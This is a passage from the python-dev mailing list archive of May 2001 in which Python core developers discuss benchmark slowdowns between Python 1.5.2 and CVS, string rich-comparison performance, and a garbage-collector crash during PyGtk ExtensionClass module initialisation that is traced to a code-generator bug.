In-Reply-To: <3B02C808.E3354D3F@lemburg.com>
References: <3B02C808.E3354D3F@lemburg.com>
Message-ID: <15107.315.19349.268345@slothrop.digicool.com>

As usual, the results you're reporting are quite different than what I
see on my machine.  I'd like to think that my machine is more normal
than yours, but I expect we're both oddballs <0.2 wink>.  I see
basically the same slowdowns that you see, but the amount of the
slowdown is quite a bit smaller.

I compared current CVS with 1.5.2, both compiled with GCC 2.95.3 and
the -O3 flag; ran pybench of an 800MHz P3 with 256MB RAM running Linux
2.2.17.

Python 1.5.2:
Pystone(1.1) time for 10000 passes = 0.85
This machine benchmarks at 11764.7 pystones/second

Python CVS:
Pystone(1.1) time for 10000 passes = 0.94
This machine benchmarks at 10638.3 pystones/second

PYBENCH 0.9

Benchmark: cvs (rounds=10, warp=100)

Tests:                              per run    per oper.  diff *
------------------------------------------------------------------------
          BuiltinFunctionCalls:      41.85 ms    1.64 us  +31.40%
                 CompareFloats:      39.60 ms    0.44 us  +13.96%
         CompareFloatsIntegers:
               CompareIntegers:
                  CompareLongs:      39.85 ms    0.44 us  +15.01%
                CompareStrings:
                CompareUnicode:
                 ConcatStrings:      48.65 ms    1.62 us  +46.76%
                 ConcatUnicode:
               CreateInstances:      75.75 ms    9.02 us  +55.54%
       CreateStringsWithConcat:      51.60 ms    1.29 us  +62.78%
       CreateUnicodeWithConcat:
                  DictCreation:      87.80 ms    2.93 us  +115.72%
             DictWithFloatKeys:
           DictWithIntegerKeys:
            DictWithStringKeys:
                      ForLoops:      63.85 ms   31.93 us  -13.60%
                    IfThenElse:
                   ListSlicing:
                NestedForLoops:      32.95 ms    0.66 us  +10.39%
          NormalClassAttribute:
       NormalInstanceAttribute:
           PythonFunctionCalls:      48.85 ms    1.48 us  +11.78%
             PythonMethodCalls:      38.95 ms    2.60 us  +12.09%
                     Recursion:
                  SecondImport:      37.80 ms    7.56 us  +65.79%
           SecondPackageImport:      38.95 ms    7.79 us  +50.68%
         SecondSubmoduleImport:      49.90 ms    9.98 us  +35.05%
       SimpleComplexArithmetic:      58.95 ms    1.34 us  +74.67%
        SimpleDictManipulation:
         SimpleFloatArithmetic:
      SimpleIntFloatArithmetic:
       SimpleIntegerArithmetic:
        SimpleListManipulation:      43.65 ms    0.81 us  +15.63%
          SimpleLongArithmetic:      42.70 ms    1.29 us  +53.32%
                    SmallLists:      79.15 ms    1.55 us  +56.89%
                   SmallTuples:      66.65 ms    1.39 us  +43.03%
         SpecialClassAttribute:
      SpecialInstanceAttribute:
                StringMappings:
              StringPredicates:
                 StringSlicing:      39.00 ms    1.11 us  +28.71%
                     TryExcept:
                TryRaiseExcept:      50.60 ms   16.87 us  +27.46%
                  TupleSlicing:      37.90 ms    1.80 us  +26.54%
               UnicodeMappings:
             UnicodePredicates:
             UnicodeProperties:
                UnicodeSlicing:
------------------------------------------------------------------------
            Average round time:    3177.00 ms                n/a

*) measured against: 1.5.2 (rounds=10, warp=100)

(As MAL did, I removed all the results were the difference is +/-
10%.)

i-never-do-simple-complex-arithmetic-anyway-ly yr's,
Jeremy


From martin at loewis.home.cs.tu-berlin.de  Thu May 17 08:12:18 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Thu, 17 May 2001 08:12:18 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEKMKCAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCGEKMKCAA.tim.one@home.com>
Message-ID: <200105170612.f4H6CI703034@mira.informatik.hu-berlin.de>

> OK, from what I understand, that makes no sense.  Does it to you?

After reviewing everything again, I think I now do: In the richcomp
case, I have

			res = (*f1)(v, w, op);
			if (res != Py_NotImplemented)
				return res;

f1 is string_richcompare, so I get 2 function calls inside do_richcmp:
one to string_richcompare, the other one to string_compare, as my
optimizations are not triggered in your example.

If I set tp_richcompare of strings to 0, I get past this code, and do

		c = (*f)(v, w);
		if (PyErr_Occurred())
			return NULL;
		return convert_3way_to_object(op, c);

Here, I get 3 function calls: f is string_compare, then
PyErr_Occurred, finally convert_3way_to_object, which converts
{-1,0,1} x Op -> {Py_True, Py_False}.

Indeed, when I inline convert_3way_to_object, I get the same speed in
both cases (with the remaining differences attributed to measurement
and gcc doing register usage differently in both functions).

I'd still be in favour of giving strings a richcompare, since it
allows to optimize what I think is the single most frequent case:
Py_EQ on strings. With a control flow like

		if (a->ob_size != b->ob_size) 
                   goto False;

		if (a->ob_size == 0) 
                   goto True;

		if (a->ob_sval[0] != b->ob_sval[0])
                   goto False;

		if(memcmp(a->ob_sval, b->ob_sval, a->ob_size))
                   goto False;
                else
                   goto True;

we can reduce the number of function calls 

Regards,
Martin


From skip at pobox.com  Thu May 17 08:42:41 2001
From: skip at pobox.com (skip at pobox.com)
Date: Thu, 17 May 2001 01:42:41 -0500
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround
Message-ID: <15107.29409.242342.200378@beluga.mojam.com>

Over the past couple days I've included python-dev on various messages in an
ongoing thread about a segmentation violation I was getting with the new
PyGtk2 wrappers.  With some excellent assistance from the GC maestro, Neil
Schemenauer, I finally know what's going on and I have a simple workaround
that lets me get back to work.  Here's a summary of the problem.

When defining ExtensionClass types, you need to create and initialize a
PyExtensionClass struct.  It looks something like so:

    PyExtensionClass PyGtkTreeSortable_Type = {
	PyObject_HEAD_INIT(NULL)
	0,				/* ob_size */
	"GtkTreeSortable",			/* tp_name */
	sizeof(PyPureMixinObject),	/* tp_basicsize */
	...
    };

Note that the parameter to the PyObject_HEAD_INIT macro is NULL.  It would
normally be the address of a type object (e.g. &PyType_Type).  However, Jim
Fulton pointed out that on Windows you can't get the address of &PyType_Type
object at compile time.  Accordingly, ExtensionClass provides a
PyExtensionClass_Export macro whose responsibility is, in part, to set the
ob_type field appropriately at runtime.  (I'm not sure why this Windows nit
doesn't afflict other type declarations like PyTuple_Type.  I'm sure others
will know why.  I just accept Jim's word as gospel and move on...)

A problem arises if the garbage collector runs while the module
initialization function is running, but before all the ob_type fields have
been assigned their correct values.  In this case, a one-element tuple
representing the bases of a particular PyGtk extension class was traversed
by the garbage collector.

The workaround turns out to be exceedingly simple:

    import gc
    gc.disable()
    import gtk
    gc.enable()

I can handle doing that from Python code for the time being and will leave
it up to others to decide how, if at all, ExtensionClass should be changed
to correct the problem.

Skip


From martin at loewis.home.cs.tu-berlin.de  Thu May 17 08:41:15 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Thu, 17 May 2001 08:41:15 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCEEHOKCAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCEEHOKCAA.tim.one@home.com>
Message-ID: <200105170641.f4H6fFn03235@mira.informatik.hu-berlin.de>

> 1. String objects are also equal despite being different objects,
>    if their ob_sinterned pointers are equal and non-NULL.  So if
>    you're looking for every trick in & out of the book, that's
>    another one.

That does not help. In the entire test suite, there are 0 instances
where strings are compared which are not identical, but have equal
ob_sinterned pointers.

> > So 5% of the calls are with identical strings, for which I can
> > immediately decide the outcome.
>
> But also at the cost of doing a fruitless compare and branch in 95%
> of calls.

Whether there's a fruitless branch depends on your compiler. With gcc
3, you can write

	if (__builtin_expect(a == b, 0)) {

and then the body of the if block will be moved out of the way of
linear control flow.

> Any idea where those 800,000 virgin calls to oldcomp are coming
> from?  That's a lot.

As far as I could trace it, most of them come from lookdict_string (at
various locations inside this function).

> > #comps:                        2949421
> > #memcmps:                       917776
> >
> > So still, ca. 30% can be decided by first byte.
> 
> Sorry, I couldn't follow this part, except noting that 917776 is about 30% of
> 2949421, in which case I would have expected you to say that 70% can be
> decided by first byte.

Oops, you are right.

> It's clearer that this is going to hurt sorting (& bisect etc), by
> adding yet another layer of function call to get Py_LT resolved (as
> for dict compares too, the string richcmp can't do anything to speed
> up Py_LT that string oldcmp can't do just as efficiently -- indeed,
> that's the great advantage oldcmp's "compare first character" test
> had: that *can* decide Py_LT in one byte much of the time (but
> length comparison cannot)).

So to support sorting better, I should special-case Py_LT in
string_richcompare also, to avoid the function call ?-)

> Note too earlier mail about how adding a richcmp slot to strings will
> suddenly slow cmp(string1, string2) (which is the usual way to program a
> search tree, because cmp() *used* to call a string comparison routine only
> once; but after adding a richcmp slot, each cmp(string1, string2) will call
> the richcmp slot from 1 thru 3 times (data-dependent)).

Yes, that is a serious problem. Fortunately, very few calls in my
programs go to string_compare through cmp() now. But then, your
programs are different, of course...

Regards,
Martin


From mal at lemburg.com  Thu May 17 08:54:37 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 17 May 2001 08:54:37 +0200
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a 
 workaround
References: <15107.29409.242342.200378@beluga.mojam.com>
Message-ID: <3B0375AD.24E039B0@lemburg.com>

skip at pobox.com wrote:
> 
> Over the past couple days I've included python-dev on various messages in an
> ongoing thread about a segmentation violation I was getting with the new
> PyGtk2 wrappers.  With some excellent assistance from the GC maestro, Neil
> Schemenauer, I finally know what's going on and I have a simple workaround
> that lets me get back to work.  Here's a summary of the problem.
> 
> When defining ExtensionClass types, you need to create and initialize a
> PyExtensionClass struct.  It looks something like so:
> 
>     PyExtensionClass PyGtkTreeSortable_Type = {
>         PyObject_HEAD_INIT(NULL)
>         0,                              /* ob_size */
>         "GtkTreeSortable",                      /* tp_name */
>         sizeof(PyPureMixinObject),      /* tp_basicsize */
>         ...
>     };
> 
> Note that the parameter to the PyObject_HEAD_INIT macro is NULL.  It would
> normally be the address of a type object (e.g. &PyType_Type).  However, Jim
> Fulton pointed out that on Windows you can't get the address of &PyType_Type
> object at compile time.  Accordingly, ExtensionClass provides a
> PyExtensionClass_Export macro whose responsibility is, in part, to set the
> ob_type field appropriately at runtime.  (I'm not sure why this Windows nit
> doesn't afflict other type declarations like PyTuple_Type.  I'm sure others
> will know why.  I just accept Jim's word as gospel and move on...)
> 
> A problem arises if the garbage collector runs while the module
> initialization function is running, but before all the ob_type fields have
> been assigned their correct values.  In this case, a one-element tuple
> representing the bases of a particular PyGtk extension class was traversed
> by the garbage collector.

I wonder how the GC collector could "see" the type object before
it has been initialized... since PyGtkTreeSortable_Type is a static
C array and not a known PyObject until you add it to some Python
dictionary as type object or use it for creating instances, it
seems strange that the GC collector can reach out for it and
get hit by the fact that it is not yet properly initialized.

Some logic in PyExtensionClass_Export() or the GTK module must
be twisted.
 
> The workaround turns out to be exceedingly simple:
> 
>     import gc
>     gc.disable()
>     import gtk
>     gc.enable()
> 
> I can handle doing that from Python code for the time being and will leave
> it up to others to decide how, if at all, ExtensionClass should be changed
> to correct the problem.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From fredrik at effbot.org  Thu May 17 09:00:20 2001
From: fredrik at effbot.org (Fredrik Lundh)
Date: Thu, 17 May 2001 09:00:20 +0200
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround
References: <15107.29409.242342.200378@beluga.mojam.com>
Message-ID: <00c101c0de9f$0a6c4d10$e46940d5@hagrid>

Skip wrote:
> When defining ExtensionClass types, you need to create and initialize a
> PyExtensionClass struct.  It looks something like so:
> 
>     PyExtensionClass PyGtkTreeSortable_Type = {
>        PyObject_HEAD_INIT(NULL)
>        0, /* ob_size */
>        "GtkTreeSortable", /* tp_name */
>        sizeof(PyPureMixinObject), /* tp_basicsize */
>        ...
>     };
> 
> Note that the parameter to the PyObject_HEAD_INIT macro is NULL.  It would
> normally be the address of a type object (e.g. &PyType_Type).  However, Jim
> Fulton pointed out that on Windows you can't get the address of &PyType_Type
> object at compile time. Accordingly, ExtensionClass provides a
> PyExtensionClass_Export macro whose responsibility is, in part, to set the
> ob_type field appropriately at runtime

footnote: this is usually done in the module init function, *before*
the call to Py_InitModule.  see:

    http://www.python.org/doc/FAQ.html#3.24

if the garbage collector can run after Python calls a module's init-
function, but before that module calls back into Python, anything
can happen...

Cheers /F


From skip at pobox.com  Thu May 17 09:04:06 2001
From: skip at pobox.com (skip at pobox.com)
Date: Thu, 17 May 2001 02:04:06 -0500
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a 
 workaround
In-Reply-To: <3B0375AD.24E039B0@lemburg.com>
References: <15107.29409.242342.200378@beluga.mojam.com>
	<3B0375AD.24E039B0@lemburg.com>
Message-ID: <15107.30694.131193.989215@beluga.mojam.com>

    mal> I wonder how the GC collector could "see" the type object before it
    mal> has been initialized... since PyGtkTreeSortable_Type is a static C
    mal> array and not a known PyObject until you add it to some Python
    mal> dictionary as type object or use it for creating instances, it
    mal> seems strange that the GC collector can reach out for it and get
    mal> hit by the fact that it is not yet properly initialized.

It is actually PyGtkWidget_Type that is not yet initialized when it is
placed in the bases tuple for one of its subclasses.  GC traverses that
tuple, then dives into each element.  It hits the PyGtkWidget_Type object,
whose ob_type field has not yet been initialized.  The actual object whose
bases tuple is being traversed is (in all the crashes I encountered),
GdkDragContext.  The ordering of the registration calls could perhaps be
reordered.  Currently GdkDragContext is patched up before GtkWidget, its
base class.  This code is generated by James Henstridge's wrapper code
generator, so perhaps he can maintain the necessary class hierarchy
relationships and insure that base classes are initialized before their
subclasses.

Skip


From skip at pobox.com  Thu May 17 09:07:15 2001
From: skip at pobox.com (skip at pobox.com)
Date: Thu, 17 May 2001 02:07:15 -0500
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround
In-Reply-To: <00c101c0de9f$0a6c4d10$e46940d5@hagrid>
References: <15107.29409.242342.200378@beluga.mojam.com>
	<00c101c0de9f$0a6c4d10$e46940d5@hagrid>
Message-ID: <15107.30883.680397.280556@beluga.mojam.com>

    Fredrik> footnote: this is usually done in the module init function,
    Fredrik> *before* the call to Py_InitModule.  see:

    Fredrik>     http://www.python.org/doc/FAQ.html#3.24

    Fredrik> if the garbage collector can run after Python calls a module's
    Fredrik> init- function, but before that module calls back into Python,
    Fredrik> anything can happen...

Thanks for pointing that out.  Py_InitModule is indeed called before the
fixup occurs.

Skip


From mal at lemburg.com  Thu May 17 09:09:38 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 17 May 2001 09:09:38 +0200
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a 
 workaround
References: <15107.29409.242342.200378@beluga.mojam.com>
		<3B0375AD.24E039B0@lemburg.com> <15107.30694.131193.989215@beluga.mojam.com>
Message-ID: <3B037932.476F475A@lemburg.com>

skip at pobox.com wrote:
> 
>     mal> I wonder how the GC collector could "see" the type object before it
>     mal> has been initialized... since PyGtkTreeSortable_Type is a static C
>     mal> array and not a known PyObject until you add it to some Python
>     mal> dictionary as type object or use it for creating instances, it
>     mal> seems strange that the GC collector can reach out for it and get
>     mal> hit by the fact that it is not yet properly initialized.
> 
> It is actually PyGtkWidget_Type that is not yet initialized when it is
> placed in the bases tuple for one of its subclasses.  GC traverses that
> tuple, then dives into each element.  It hits the PyGtkWidget_Type object,
> whose ob_type field has not yet been initialized.  The actual object whose
> bases tuple is being traversed is (in all the crashes I encountered),
> GdkDragContext.  The ordering of the registration calls could perhaps be
> reordered.  Currently GdkDragContext is patched up before GtkWidget, its
> base class.  This code is generated by James Henstridge's wrapper code
> generator, so perhaps he can maintain the necessary class hierarchy
> relationships and insure that base classes are initialized before their
> subclasses.

Wouldn't it be easier to simply set the ob_type fields right at the
start of the initGtk() function ? This is what I do for all
my extensions and I've never seen any problems with it.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From james at daa.com.au  Thu May 17 09:18:23 2001
From: james at daa.com.au (James Henstridge)
Date: Thu, 17 May 2001 15:18:23 +0800 (WST)
Subject: [Python-Dev] Re: GC and ExtensionClass - a summary of the problem and a workaround
In-Reply-To: <15107.29409.242342.200378@beluga.mojam.com>
Message-ID: <Pine.LNX.4.33.0105171515140.409-100000@quoll.daa.com.au>

On Thu, 17 May 2001 skip at pobox.com wrote:

>
> Over the past couple days I've included python-dev on various messages in an
> ongoing thread about a segmentation violation I was getting with the new
> PyGtk2 wrappers.  With some excellent assistance from the GC maestro, Neil
> Schemenauer, I finally know what's going on and I have a simple workaround
> that lets me get back to work.  Here's a summary of the problem.
>
> When defining ExtensionClass types, you need to create and initialize a
> PyExtensionClass struct.  It looks something like so:
>
>     PyExtensionClass PyGtkTreeSortable_Type = {
> 	PyObject_HEAD_INIT(NULL)
> 	0,				/* ob_size */
> 	"GtkTreeSortable",			/* tp_name */
> 	sizeof(PyPureMixinObject),	/* tp_basicsize */
> 	...
>     };
>
> Note that the parameter to the PyObject_HEAD_INIT macro is NULL.  It would
> normally be the address of a type object (e.g. &PyType_Type).  However, Jim
> Fulton pointed out that on Windows you can't get the address of &PyType_Type
> object at compile time.  Accordingly, ExtensionClass provides a
> PyExtensionClass_Export macro whose responsibility is, in part, to set the
> ob_type field appropriately at runtime.  (I'm not sure why this Windows nit
> doesn't afflict other type declarations like PyTuple_Type.  I'm sure others
> will know why.  I just accept Jim's word as gospel and move on...)

Well, for Extension Classes, PyType_Type is not correct either.  And
because ExtensionClass is loaded at runtime, we can't set the ob_type
field in the initialiser even on Unix systems.

>
> A problem arises if the garbage collector runs while the module
> initialization function is running, but before all the ob_type fields have
> been assigned their correct values.  In this case, a one-element tuple
> representing the bases of a particular PyGtk extension class was traversed
> by the garbage collector.
>
> The workaround turns out to be exceedingly simple:
>
>     import gc
>     gc.disable()
>     import gtk
>     gc.enable()
>
> I can handle doing that from Python code for the time being and will leave
> it up to others to decide how, if at all, ExtensionClass should be changed
> to correct the problem.

Thanks for debugging this problem Skip.  If we don't find a correct
solution to the problem, I can put the gc disable/enable calls inside the
gtk/__init__.py module.

James.


From mal at lemburg.com  Thu May 17 09:26:32 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 17 May 2001 09:26:32 +0200
Subject: [Python-Dev] Performance compares
References: <LNBBLJKPBEHFEDALKOLCCEKNKCAA.tim.one@home.com>
Message-ID: <3B037D27.E258C363@lemburg.com>

Tim Peters wrote:
> 
> [MAL]
> > Since it is possible that these figures result from my specific
> > machine setup, I'd like to know what other people see on their
> > machines.
> 
> Is this the same machine where you were able to get 15% difference a few
> years ago by adding or removing an unreachable printf in ceval.c (or was that
> Vladimir)?  If so, I bet it's degenerated to random 50% difference since then
> <wink>.

That must have been Valdimir's machine... even though I do admit
that some small reordering changes do result in speedups of
up to 10% -- probably due to the compiler accidentally creating
code which the CPUs cache management likes.
 
> My Win98SE box is *astonishingly* useless for timings.  Without fail, the
> first time I run pystone after a reboot yields a result a solid 50% higher
> than the second or subsequent times I run it (yes, it's major-league *slower*
> the second time).  This is true across dozens of trials over several months,
> and across all versions of Python.

On Linux the situation is somewhat different; still I'm executing
the tests 10-times each and for the figures I posted, I even
ran pybench twice and only took the second readings as basis.
 
> And simple little loops routinely vary in reported runtime by a factor of 3.
> I may have to dig my old Win95 box out of the packing crate <0.6 wink>.
> 
> None of that changes, of course, that the numbers you got are scary.

Sure are... but I'm not so much interested in the absolute
numbers -- it's the hot-spots which showed up that scare me:
e.g. dictionary creation seems to have suffered along the way
for some reason, functions calls are even slower now than they
were previously and other important tasks such a instance
creation take a similar hit (probably as a result of the other
two).

Running the same test for 2.1 vs. 2.0 there's not much to
notice, so the important changes seem to be originating in
the move from 1.5.2 to 2.0.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From james at daa.com.au  Thu May 17 09:33:17 2001
From: james at daa.com.au (James Henstridge)
Date: Thu, 17 May 2001 15:33:17 +0800 (WST)
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem
 and a workaround
In-Reply-To: <00c101c0de9f$0a6c4d10$e46940d5@hagrid>
Message-ID: <Pine.LNX.4.33.0105171522400.409-100000@quoll.daa.com.au>

On Thu, 17 May 2001, Fredrik Lundh wrote:

> footnote: this is usually done in the module init function, *before*
> the call to Py_InitModule.  see:

The PyExtensionClass_Export() function requires a pointer to the module
dictionary so that it can add itself to the module.  Unfortunately this
requires that Py_InitModule to have been called before hand.

I guess this means that the current ExtensionClass API will need to be
modified in order to allow ExtensionClasses to be initialised before
Py_InitModule.

>
>     http://www.python.org/doc/FAQ.html#3.24
>
> if the garbage collector can run after Python calls a module's init-
> function, but before that module calls back into Python, anything
> can happen...

James.


From mwh at python.net  Thu May 17 09:43:38 2001
From: mwh at python.net (Michael Hudson)
Date: 17 May 2001 08:43:38 +0100
Subject: [Python-Dev] Performance compares
In-Reply-To: "M.-A. Lemburg"'s message of "Thu, 17 May 2001 09:26:32 +0200"
References: <LNBBLJKPBEHFEDALKOLCCEKNKCAA.tim.one@home.com> <3B037D27.E258C363@lemburg.com>
Message-ID: <m3pud8mndh.fsf@atrus.jesus.cam.ac.uk>

"M.-A. Lemburg" <mal at lemburg.com> writes:

> Sure are... but I'm not so much interested in the absolute numbers
> -- it's the hot-spots which showed up that scare me: e.g. dictionary
> creation seems to have suffered along the way for some reason,
> functions calls are even slower now than they were previously and
> other important tasks such a instance creation take a similar hit
> (probably as a result of the other two).

Have you tried fiddling with gc parameters?  If the GC does a multi
generation trawl through the heap in the middle of some test, that
might skew the numbers in unexpected ways.

Or not, of course.

Cheers,
M.

-- 
  CLiki pages can be edited by anybody at any time. Imagine the most
  fearsomely comprehensive legal disclaimer you have ever seen, and
  double it                        -- http://ww.telent.net/cliki/index


From mal at lemburg.com  Thu May 17 11:03:06 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 17 May 2001 11:03:06 +0200
Subject: [Python-Dev] Performance compares
References: <LNBBLJKPBEHFEDALKOLCCEKNKCAA.tim.one@home.com> <3B037D27.E258C363@lemburg.com> <m3pud8mndh.fsf@atrus.jesus.cam.ac.uk>
Message-ID: <3B0393CA.7B0E024C@lemburg.com>

Michael Hudson wrote:
> 
> "M.-A. Lemburg" <mal at lemburg.com> writes:
> 
> > Sure are... but I'm not so much interested in the absolute numbers
> > -- it's the hot-spots which showed up that scare me: e.g. dictionary
> > creation seems to have suffered along the way for some reason,
> > functions calls are even slower now than they were previously and
> > other important tasks such a instance creation take a similar hit
> > (probably as a result of the other two).
> 
> Have you tried fiddling with gc parameters?  If the GC does a multi
> generation trawl through the heap in the middle of some test, that
> might skew the numbers in unexpected ways.
> 
> Or not, of course.

No, I haven't tried fiddling with those. I'm not sure I want
to either ;-) ... the reason is that applications won't switch
off GC for execution and so the tests is closer to real life.

Still, I'll rerun the test suite using gc.disable() and post the 
results.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Thu May 17 11:18:36 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 17 May 2001 11:18:36 +0200
Subject: [Python-Dev] Performance compares
References: <LNBBLJKPBEHFEDALKOLCCEKNKCAA.tim.one@home.com> <3B037D27.E258C363@lemburg.com> <m3pud8mndh.fsf@atrus.jesus.cam.ac.uk> <3B0393CA.7B0E024C@lemburg.com>
Message-ID: <3B03976C.CF47961@lemburg.com>

"M.-A. Lemburg" wrote:
> 
> Michael Hudson wrote:
> >
> > "M.-A. Lemburg" <mal at lemburg.com> writes:
> >
> > > Sure are... but I'm not so much interested in the absolute numbers
> > > -- it's the hot-spots which showed up that scare me: e.g. dictionary
> > > creation seems to have suffered along the way for some reason,
> > > functions calls are even slower now than they were previously and
> > > other important tasks such a instance creation take a similar hit
> > > (probably as a result of the other two).
> >
> > Have you tried fiddling with gc parameters?  If the GC does a multi
> > generation trawl through the heap in the middle of some test, that
> > might skew the numbers in unexpected ways.
> >
> > Or not, of course.
> 
> No, I haven't tried fiddling with those. I'm not sure I want
> to either ;-) ... the reason is that applications won't switch
> off GC for execution and so the tests is closer to real life.
> 
> Still, I'll rerun the test suite using gc.disable() and post the
> results.

Turns out, the difference is not noticable (< 1%).

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From gmcm at hypernet.com  Thu May 17 15:00:27 2001
From: gmcm at hypernet.com (Gordon McMillan)
Date: Thu, 17 May 2001 09:00:27 -0400
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround
In-Reply-To: <15107.29409.242342.200378@beluga.mojam.com>
Message-ID: <3B03932B.8219.CCBF9F3F@localhost>

[Skip] 

> Note that the parameter to the PyObject_HEAD_INIT macro is NULL. 
> It would normally be the address of a type object (e.g.
> &PyType_Type).  However, Jim Fulton pointed out that on Windows
> you can't get the address of &PyType_Type object at compile time.

This is MS being passive-aggressive. If you tell MSVC the 
source is C++, it will magically find the address of 
PyType_Type at compile time, but their language lawyers 
apparently  believe the C spec disallows this. Standards 
conformant and incompatible -

what-MS-calls-"win-win"-ly y'rs

- Gordon


From guido at digicool.com  Thu May 17 16:04:59 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 17 May 2001 09:04:59 -0500
Subject: [Python-Dev] Comparison speed
In-Reply-To: Your message of "Thu, 17 May 2001 08:12:18 +0200."
             <200105170612.f4H6CI703034@mira.informatik.hu-berlin.de> 
References: <LNBBLJKPBEHFEDALKOLCGEKMKCAA.tim.one@home.com>  
            <200105170612.f4H6CI703034@mira.informatik.hu-berlin.de> 
Message-ID: <200105171405.JAA14836@cj20424-a.reston1.va.home.com>

> I'd still be in favour of giving strings a richcompare, since it
> allows to optimize what I think is the single most frequent case:
> Py_EQ on strings.

I have always thought that eventually (but long before Py3K!) all
objects would only support rich comparisons and the __cmp__ and
tp_compare slots would become completely obsolete.  I realize I
probably haven't expressed this thought clearly, and I'm not going to
push for this to happen quickly or forecefully, but it's nevertheless
how I see things.  I expect it would allow a tremendous cleanup of the
comparison code.  It will never reach the simplicity of cmp() -- but
think of Einstein's (?) rule "things should be as simple as they can
be, but no simpler."  Clearly cmp() was too simple. :-)

Anyway, it worries me whenever I hear someone express the thought that
adding rich comparisons to a particular object type would be a bad
idea because it would slow things down.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Thu May 17 16:37:30 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 17 May 2001 10:37:30 -0400
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround
In-Reply-To: Your message of "Thu, 17 May 2001 09:00:27 EDT."
             <3B03932B.8219.CCBF9F3F@localhost> 
References: <3B03932B.8219.CCBF9F3F@localhost> 
Message-ID: <200105171437.f4HEbUB09503@odiug.digicool.com>

> [Skip] 
> 
> > Note that the parameter to the PyObject_HEAD_INIT macro is NULL. 
> > It would normally be the address of a type object (e.g.
> > &PyType_Type).  However, Jim Fulton pointed out that on Windows
> > you can't get the address of &PyType_Type object at compile time.
> 
> This is MS being passive-aggressive. If you tell MSVC the 
> source is C++, it will magically find the address of 
> PyType_Type at compile time, but their language lawyers 
> apparently  believe the C spec disallows this. Standards 
> conformant and incompatible -
> 
> what-MS-calls-"win-win"-ly y'rs
> 
> - Gordon

I don't think MS blames it on the language spec so much; it's probably
more that they use the spec as an excuse not to fix their
implementation.  The problem only occurs when the definition of the
symbol is in a different DLL than the reference.  This is why built-in
types like PyTuple_Type don't have this problem.  I guess for C++ they
have to do a dynamic initializer anyway, so they can make this work,
but they haven't bothered to make it work for C.

My other point is that Skip's problem is clearly a gtk bug: it
shouldn't have exposed the type before fully initializing it.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From james at daa.com.au  Thu May 17 16:48:43 2001
From: james at daa.com.au (James Henstridge)
Date: Thu, 17 May 2001 22:48:43 +0800 (WST)
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem
 and a workaround
In-Reply-To: <200105171437.f4HEbUB09503@odiug.digicool.com>
Message-ID: <Pine.LNX.4.33.0105172240320.22792-100000@james.daa.com.au>

On Thu, 17 May 2001, Guido van Rossum wrote:

> My other point is that Skip's problem is clearly a gtk bug: it
> shouldn't have exposed the type before fully initializing it.

On further investigation, it turned out that it was caused by a bug in my
code generator that caused one extension class to be initialised before
its base class (in fact, that particular extension class shouldn't have
had any base classes).  It was just the cyclic GC code triggering the bug.

It will be fixed in the next snapshot of pygtk for GTK+ 2.0

James.

-- 
Email: james at daa.com.au
WWW:   http://www.daa.com.au/~james/


From guido at digicool.com  Thu May 17 16:52:54 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 17 May 2001 10:52:54 -0400
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround
In-Reply-To: Your message of "Thu, 17 May 2001 22:48:43 +0800."
             <Pine.LNX.4.33.0105172240320.22792-100000@james.daa.com.au> 
References: <Pine.LNX.4.33.0105172240320.22792-100000@james.daa.com.au> 
Message-ID: <200105171452.f4HEqse09691@odiug.digicool.com>

> On further investigation, it turned out that it was caused by a bug in my
> code generator that caused one extension class to be initialised before
> its base class (in fact, that particular extension class shouldn't have
> had any base classes).  It was just the cyclic GC code triggering the bug.
> 
> It will be fixed in the next snapshot of pygtk for GTK+ 2.0

Excellent news, James!  I love the open source process!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From barry at digicool.com  Thu May 17 17:04:50 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Thu, 17 May 2001 11:04:50 -0400
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround
References: <Pine.LNX.4.33.0105172240320.22792-100000@james.daa.com.au>
	<200105171452.f4HEqse09691@odiug.digicool.com>
Message-ID: <15107.59538.421007.37251@anthem.wooz.org>

